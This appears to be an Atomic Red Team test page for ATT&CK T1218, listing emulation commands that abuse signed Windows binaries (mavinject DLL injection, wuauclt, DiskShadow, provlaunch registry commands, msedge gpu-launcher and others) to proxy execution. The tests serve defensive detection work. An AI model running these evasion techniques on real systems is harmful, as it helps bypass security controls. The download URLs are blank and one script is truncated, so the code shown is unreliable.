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764 lines (419 loc) · 22 KB

T1218 - Signed Binary Proxy Execution

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)

Atomic Tests

Atomic Test #1 - mavinject - Inject DLL into running process

Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

Supported Platforms: Windows

auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61


Name Description Type Default Value
process_id PID of process receiving injection string 1000
dll_payload DLL to inject path PathToAtomicsFolder\T1218\src\x64\T1218.dll

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

mavinject.exe #{process_id} /INJECTRUNNING "#{dll_payload}"

Dependencies: Run with powershell!

Description: T1218.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "" -OutFile "#{dll_payload}"

Atomic Test #2 - Register-CimProvider - Execute evil dll

Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB

Supported Platforms: Windows

auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655


Name Description Type Default Value
dll_payload DLL to execute path PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll

Attack Commands: Run with command_prompt!

C:\Windows\SysWow64\Register-CimProvider.exe -Path "#{dll_payload}"

Dependencies: Run with powershell!

Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "" -OutFile "#{dll_payload}"

Atomic Test #3 - InfDefaultInstall.exe .inf Execution

Test execution of a .inf using InfDefaultInstall.exe


Supported Platforms: Windows

auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef


Name Description Type Default Value
inf_to_execute Local location of inf file string PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf

Attack Commands: Run with command_prompt!

InfDefaultInstall.exe "#{inf_to_execute}"

Dependencies: Run with powershell!

Description: INF file must exist on disk at specified location (#{inf_to_execute})
Check Prereq Commands:
if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "" -OutFile "#{inf_to_execute}"

Atomic Test #4 - ProtocolHandler.exe Downloaded a Suspicious File

Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.

Supported Platforms: Windows

auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2


Name Description Type Default Value
remote_url url to document url

Attack Commands: Run with command_prompt!

FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"

Dependencies: Run with powershell!

Description: Microsoft Word must be installed
Check Prereq Commands:
try {
  $wdApp = New-Object -COMObject "Word.Application"
  Stop-Process -Name "winword"
  exit 0 } catch { exit 1 }
Get Prereq Commands:
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

Atomic Test #5 - Microsoft.Workflow.Compiler.exe Payload Execution

Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe

Supported Platforms: Windows

auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e


Name Description Type Default Value
xml_payload XML to execution path PathToAtomicsFolder\T1218\src\T1218.xml
mwcpath Default location of Microsoft.Workflow.Compiler.exe path C:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcname Default name of microsoft.workflow.compiler.exe path microsoft.workflow.compiler.exe

Attack Commands: Run with powershell!

#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt

Dependencies: Run with powershell!

Description: .Net must be installed for this test to work correctly.
Check Prereq Commands:
if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1}
Get Prereq Commands:
write-host ".Net must be installed for this test to work correctly."

Atomic Test #6 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions

Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe

Supported Platforms: Windows

auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911


Name Description Type Default Value
xml_payload XML to execution path PathToAtomicsFolder\T1218\src\T1218.xml
renamed_binary renamed Microsoft.Workflow.Compiler path PathToAtomicsFolder\..\ExternalPayloads\svchost.exe
mwcpath Default location of Microsoft.Workflow.Compiler.exe path C:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcname Default name of microsoft.workflow.compiler.exe path microsoft.workflow.compiler.exe

Attack Commands: Run with powershell!

&"#{renamed_binary}" "#{xml_payload}" output.txt

Dependencies: Run with powershell!

Description: .Net must be installed for this test to work correctly.
Check Prereq Commands:
if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force

Atomic Test #7 - Invoke-ATHRemoteFXvGPUDisablementCommand base test

RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).

One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.

Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe.

The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.


Supported Platforms: Windows

auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db


Name Description Type Default Value
module_name Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. string foo
module_path Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. string $PWD

Attack Commands: Run with powershell!

Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}

Dependencies: Run with powershell!

Description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.
Check Prereq Commands:
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
Get Prereq Commands:
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

Atomic Test #8 - DiskShadow Command Execution

Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference:

Supported Platforms: Windows

auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa


Name Description Type Default Value
txt_payload txt to execute path PathToAtomicsFolder\T1218\src\T1218.txt
dspath Default location of DiskShadow.exe path C:\Windows\System32\diskshadow.exe

Attack Commands: Run with powershell!

#{dspath} -S #{txt_payload}

Dependencies: Run with powershell!

Description: txt file must exist on disk at specified location (#{txt_payload})
Check Prereq Commands:
if (Test-Path "#{txt_payload}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{txt_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "" -OutFile "#{txt_payload}"
Description: DiskShadow.exe must exist on disk at specified location (#{dspath})
Check Prereq Commands:
if (Test-Path #{dspath}) {exit 0} else {exit 1}
Get Prereq Commands:
echo "DiskShadow.exe not found on disk at expected location"

Atomic Test #9 - Load Arbitrary DLL via Wuauclt (Windows Update Client)

This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. See

Supported Platforms: Windows

auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8


Name Description Type Default Value
arbitrary_dll Path of DLL to be loaded string PathToAtomicsFolder\T1218\bin\calc.dll

Attack Commands: Run with command_prompt!

wuauclt.exe /UpdateDeploymentProvider "#{arbitrary_dll}" /RunHandlerComServer

Cleanup Commands:

taskkill /f /im calculator.exe > nul 2>&1

Dependencies: Run with powershell!

Description: DLL to load must exist on disk as specified location (#{arbitrary_dll})
Check Prereq Commands:
if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{arbitrary_dll}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "" -OutFile "#{arbitrary_dll}"

Atomic Test #10 - Lolbin Gpscript logon option

Executes logon scripts configured in Group Policy.

Supported Platforms: Windows

auto_generated_guid: 5bcda9cd-8e85-48fa-861d-b5a85d91d48c

Attack Commands: Run with command_prompt!

Gpscript /logon

Atomic Test #11 - Lolbin Gpscript startup option

Executes startup scripts configured in Group Policy

Supported Platforms: Windows

auto_generated_guid: f8da74bb-21b8-4af9-8d84-f2c8e4a220e3

Attack Commands: Run with command_prompt!

Gpscript /startup

Atomic Test #12 - Lolbas ie4uinit.exe use as proxy

Executes commands from a specially prepared ie4uinit.inf file. Poc from : Reference:

Supported Platforms: Windows

auto_generated_guid: 13c0804e-615e-43ad-b223-2dfbacd0b0b3


Name Description Type Default Value
Path_inf Path to the cab file path PathToAtomicsFolder\T1218\src\ieuinit.inf
Path_ie4uinit Path to ie4uinit.exe path c:\windows\system32\ie4uinit.exe

Attack Commands: Run with command_prompt!

copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe
copy "#{Path_inf}" %TEMP%\ieuinit.inf
%TEMP%\ie4uinit.exe -BaseSettings

Cleanup Commands:

del %TEMP%\ie4uinit.exe >nul 2>&1
del %TEMP%\ieuinit.inf >nul 2>&1

Dependencies: Run with powershell!

Description: ieuinit.inf must exist on disk at specified location (#{Path_inf})
Check Prereq Commands:
if (Test-Path "#{Path_inf}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{Path_inf}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "" -OutFile "#{Path_inf}"

Atomic Test #13 - LOLBAS CustomShellHost to Spawn Process

This test simulates an adversary copying customshellhost.exe and calc.exe from C:\windows\system32\ to C:\temp\, renaming calc.exe to explorer.exe. Upon execution, customshellhost.exe will spawn calc.exe. Note this will only work on Windows 10 or 11. LOLBAS BishopFox

Supported Platforms: Windows

auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe


Name Description Type Default Value
dest_path Directory to copy files into path C:\test

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

if (-not (Test-Path #{dest_path})) {
New-Item -Path #{dest_path} -ItemType Directory
} else {
Write-Host "Directory #{dest_path} already exists." }
Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force

Cleanup Commands:

Remove-Item -Path #{dest_path} -Recurse -Force

Atomic Test #14 - Provlaunch.exe Executes Arbitrary Command via Registry Key

Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.

Supported Platforms: Windows

auto_generated_guid: ab76e34f-28bf-441f-a39c-8db4835b89cc

Attack Commands: Run with command_prompt!

reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
c:\windows\system32\provlaunch.exe LOLBin

Atomic Test #15 - LOLBAS Msedge to Spawn Process

Executes a process under a trusted Microsoft signed binary,mseddge. This test will spawn "calc.exe" as a child process of msedge.exe

Supported Platforms: Windows

auto_generated_guid: e5eedaed-ad42-4c1e-8783-19529738a349

Attack Commands: Run with powershell!

$edgePath64 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
if (Test-Path $edgePath64) {
    $edgePath = $edgePath64
} else {
    # Check 32-bit Edge installation path
    $edgePath32 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    if (Test-Path $edgePath32) {
        $edgePath = $edgePath32
    } else {
        exit 1
& $edgePath --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&"
sleep 5
taskkill -f -im msedge.exe
taskkill -f -im calc.exe
taskkill -f -im win32calc.exe

Atomic Test #16 - System Binary Proxy Execution - Wlrmdr Lolbin

Use wlrmdr(Windows Logon Reminder executable) as a proxy binary to evade defensive countermeasures

Supported Platforms: Windows

auto_generated_guid: 7816c252-b728-4ea6-a683-bd9441ca0b71


Name Description Type Default Value
payload_path Path to the executable String C:\Windows\System32\calc.exe

Attack Commands: Run with powershell!

wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u "#{payload_path}"